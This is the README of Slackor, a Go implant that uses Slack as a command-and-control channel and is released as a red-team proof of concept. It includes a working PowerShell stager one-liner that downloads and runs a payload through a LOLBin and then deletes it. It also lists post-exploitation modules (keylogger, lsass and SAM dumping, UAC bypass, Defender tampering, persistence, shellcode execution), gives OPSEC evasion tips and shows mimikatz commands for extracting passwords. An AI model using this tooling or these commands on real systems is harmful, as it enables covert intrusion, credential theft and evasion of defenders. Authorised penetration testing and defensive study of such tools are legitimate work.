github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/README.md (about) 1 # Slackor \# 2 Maintained at [https://github.com/n00py/Slackor](https://github.com/n00py/Slackor) 3 4 A Golang implant that uses Slack as a command and control channel. 5 6 This project was inspired by [Gcat](https://github.com/byt3bl33d3r/gcat) and [Twittor](https://github.com/PaulSec/twittor). 7 8 9 ![Slackor Screenshot](https://www.n00py.io/wp-content/uploads/2018/10/screenshot.png) 10 ![Wireshark Screenshot](https://www.n00py.io/wp-content/uploads/2018/09/slackor_wireshark-2-1024x349.png) 11 This tool is released as a proof of concept. Be sure to read and understand the [Slack App Developer Policy](https://api.slack.com/developer-policy) before creating any Slack apps. 12 13 Setup 14 ===== 15 16 **Note: The server is written in Python 3** 17 18 For this to work you need: 19 - A Slack Workspace 20 - [Register an app](https://api.slack.com/apps) with the following permissions: 21 - **channels:read** 22 - **channels:history** 23 - **channels:write** 24 - **files:write:user** 25 - **files:read** 26 27 - Create a bot 28 29 This repo contains five files: 30 - `install.sh` Installs dependancies 31 - `setup.py` The script to create the slack channels, database, and implant 32 - `agent.py` Script to generate new implants 33 - `server.py` The Slackor server, designed to be ran on Linux 34 - `agent.go` The golang implant 35 - `requirements.txt` Python dependencies (installed automatically) 36 37 To get started: 38 39 - `go get github.com/Coalfire-Research/Slackor` 40 - `cd $GOPATH/src/github.com/Coalfire-Research/Slackor` 41 - Run `install.sh` 42 - Run `setup.py` 43 - Supply the *OAuth Access Token* and *Bot User OAuth Access Token* from your app 44 45 After running the script successfully, several files will be created in the `dist/` directory: 46 - `agent.windows.exe`: Windows 64-bit binary 47 - `agent.upx.exe`: Windows 64-bit binary, UPX packed 48 - `agent.darwin`: macOS 64-bit binary 49 - `agent.32.linux`: Linux 32-bit binary 50 - `agent.64.linux`: Linux 64-bit binary 51 52 After starting `server.py` on a Linux host, execute whichever agent above is appropriate for your target host. 53 54 Run the "stager" module to generate a one-liner and other droppers. 55 ``` 56 powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe 57 ``` 58 This will execute InvokeWebRequest(PS v.3+) to download the payload, execute it using a [LOLBin](https://lolbas-project.github.io/lolbas/Binaries/Forfiles/), and then delete itself once killed. This is a working example but the command can tweaked to use another download method or execution method. 59 60 Usage 61 ===== 62 Type "help" or press [TAB] to see a list of available commands. type "help [COMMAND]" to see a description of that command. 63 64 ```(Slackor)``` 65 66 - **help** - Displays help menu 67 - **interact** - Interact with an agent 68 - **list** - List all registered agents 69 - **remove** - kill and remove an agent 70 - **revive** - Sends a signal to all agents to re-register with the server 71 - **stager** - Generates a one-liner to download an execute the implant 72 - **quit** - Quit the program 73 - **wipefiles** - Deletes all uploaded files out of Slack 74 75 Once an agent checks in, you can interact with it. 76 Use "interact [AGENT] to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands. 77 78 ```(Slackor:AGENT)``` 79 80 - Common Commands 81 - **back** - Return to the main menu 82 - **beacon** - change the amount of time between each check-in by an agent (default is 5 seconds) 83 - **download** - Download a file from the agent to the Slackor server 84 - **help** - Displays help menu 85 - **kill** - Kill the agent 86 - **sleep** - Cause the agent to sleep once (enter time in seconds) 87 - **sysinfo** - Displays the current user, OS version, system architecture, and number of CPU cores 88 - **upload** - Upload a file to the agent from the Slackor server 89 - **wget** - Pull down arbitrary files over HTTP/HTTPS 90 - Windows Commands 91 - **bypassuac** - Attempts to spawn a high integrity agent 92 - **cleanup** - Removes persistence artifacts 93 - **clipboard** - Retreives the contents of the clipboard 94 - **defanger** - Attempts to de-fang Windows Defender 95 - **duplicate** - Causes the agent to spawn another invocation of itself 96 - **getsystem** - Spawns an agent as NTAUTHORITY/SYSTEM 97 - **keyscan** - Starts a keylogger on the agent 98 - **minidump** - Dumps memory from lsass.exe and downloads it 99 - **persist** - Creates persistence by implanting a binary in an ADS 100 - **samdump** - Attempts to dump the SAM file for offline hash extraction 101 - **screenshot** - Takes a screenshot of the desktop and retrieves it 102 - **shellcode** - Executes x64 raw shellcode 103 - Mac Commands 104 - Linux Commands 105 - **screenshot** - Takes a screenshot of the desktop and retrieves it 106 107 #### OPSEC Considerations 108 109 Command output and downloaded files are AES encrypted in addition to Slack's TLS transport encryption. 110 111 Modules will warn you before performing tasks that write to disk. 112 When executing shell commands, take note that `cmd.exe`/`bash` will be executed. This may be monitored on the host. 113 Here are several OPSEC safe commands that will NOT execute `cmd.exe`/`bash`: 114 115 - **cat** - prints file content 116 - **cd** - change directory 117 - **find** - search directory filenames 118 - **getip** - Get external IP address (makes a DNS request) 119 - **hostname** - Displays the name of the host 120 - **ifconfig** - Displays interface information 121 - **ls** - list directory contents 122 - **mkdir** - Creates a directory 123 - **pwd** - prints the current working directory 124 - **rm** - removes a file 125 - **rmdir** - removes a directory 126 - **whoami / getuid** - prints the current user 127 128 Credits 129 ===== 130 - https://github.com/EgeBalci - Functions adapted from [HERCULES](https://github.com/EgeBalci/HERCULES) and [EGESPLOIT](https://github.com/EgeBalci/EGESPLOIT) 131 - https://github.com/SaturnsVoid - Keylogger adapted from [GoBot2](https://github.com/SaturnsVoid/GoBot2) 132 - https://github.com/vyrus001 - x64 shellcode execution [shellGo](https://github.com/vyrus001/shellGo) 133 - Crypto functions adopted from https://www.golang123.com/topic/1686 134 - Persistence idea from [Enigma0x3](https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/) 135 - Minidump adoped from [Merlin](https://github.com/Ne0nd0g/merlin), credit to [C-Sto](https://github.com/C-Sto) 136 - Screenshot code from [kbinani](https://github.com/kbinani/screenshot) 137 - Clipboard code from [atotto](https://github.com/atotto/clipboard) 138 - Stager generator from [hlldz](https://github.com/hlldz/SpookFlare) 139 - UAC bypass by [winscripting.blog](https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/) 140 - Lulzbin find by [@vector_sec](https://twitter.com/vector_sec/status/896049052642533376]) 141 - Countless threads on StackOverflow 142 - Thanks to [impacket](https://github.com/SecureAuthCorp/impacket) for dumping hashes from SAM/SYS/SECURITY reg hives. 143 - LSASS dump credential extraction made possbile using [pypykatz](https://github.com/skelsec/pypykatz) by skelsec 144 - Bob Aman ([Sporkmonger](https://github.com/sporkmonger)) for various additions 145 146 Future goals 147 ===== 148 - DOSfuscation 149 - Reflectively load DLL/PE - https://github.com/vyrus001/go-mimikatz 150 - Execute C# assemblies in memory - https://github.com/lesnuages/go-execute-assembly 151 - Source code obfuscation https://github.com/unixpickle/gobfuscate 152 153 FAQ: 154 ===== 155 **Is this safe to use for red teams/pentesting?** 156 157 Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. 158 Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. 159 Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. 160 For this reason, it is not recommended to re-use infrastructure against multiple organizations. 161 162 **What about Mimikatz?** 163 164 The implant does not have in-memory password dumping functionality. 165 If you need logonPasswords, you can try the following: 166 ``` 167 (Slackor: AGENT)minidump 168 ``` 169 THis will automically extract passwords with Pypykatz. Alternatively, you can use Mimikatz on Windows. 170 ``` 171 >mimikatz.exe 172 mimikatz # sekurlsa::Minidump lsassdump.dmp 173 mimikatz # sekurlsa::logonPasswords 174 ``` 175 **Is it cross-platform?** 176 177 It has limited cross-platform support. It has not been fully tested on all of the systems it can be run on. 178 The server was designed to run on Kali Linux. The agent is compiled for Windows, Mac, and Linux, but has 179 primarily been tested with Windows 10. Agents may mishandle commands which are not supported by that agent's 180 platform (don't try to minidump a Mac). 181 182 **How well does it scale?** 183 184 Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use. 185 186 **Is it vulnerable to standard beacon analysis?** 187 188 Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are recieved. 189 190 **Why did you do [x] when a better way to do it is [y]?** 191 192 I tried my best. PRs are encouraged :) 193 194 **It gets caught by AV!** 195 196 With this being open source now, it's bound to have issues. I'll fix modules as I can but there is no guarantee this will bypass all AV at all times.